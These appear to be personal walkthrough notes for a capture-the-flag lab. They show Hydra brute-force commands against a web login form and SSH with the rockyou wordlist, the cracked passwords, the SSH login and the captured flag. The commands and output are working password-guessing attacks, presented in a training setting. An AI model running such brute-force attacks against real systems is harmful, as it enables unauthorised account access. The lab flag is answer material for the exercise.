# Metadata 
IP: 10.10.9.84
Date Accessed: 2/7/2022 10:27AM

# Bruteforce login form 
- rockyou.txt location `cd /usr/share/wordlists`
- `hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.9.84 http-post-form "/login:username=^USER^&password=^PASS^:=Your username or password is incorrect" -V
`

`hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.9.84 http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect."
`

`ydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-02-07 10:48:02
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.9.84:80/login:username=^USER^&password=^PASS^:Your username or password is incorrect.
[80][http-post-form] host: 10.10.9.84   login: molly   password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-02-07 10:48:10
`

# Bruteforce SSH form
`DATA] attacking ssh://10.10.9.84:22/
[22][ssh] host: 10.10.9.84   login: molly   password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-02-07 10:50:45
                                                                                         
┌──(root💀kali)-[/usr/share/wordlists]
└─# ssh molly@10.10.9.84
The authenticity of host '10.10.9.84 (10.10.9.84)' can't be established.
ED25519 key fingerprint is SHA256:GDoZTIvkf54LxTp0KQhx6X2tZ+iWsg4bw0mqv/5jTY4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.9.84' (ED25519) to the list of known hosts.
molly@10.10.9.84's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-1092-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

65 packages can be updated.
32 updates are security updates.


Last login: Tue Dec 17 14:37:49 2019 from 10.8.11.98
molly@ip-10-10-9-84:~$ ls
flag2.txt
molly@ip-10-10-9-84:~$ cat flag2.txt 
THM{c8eeb0468febbadea859baeb33b2541b}
molly@ip-10-10-9-84:~$ 
`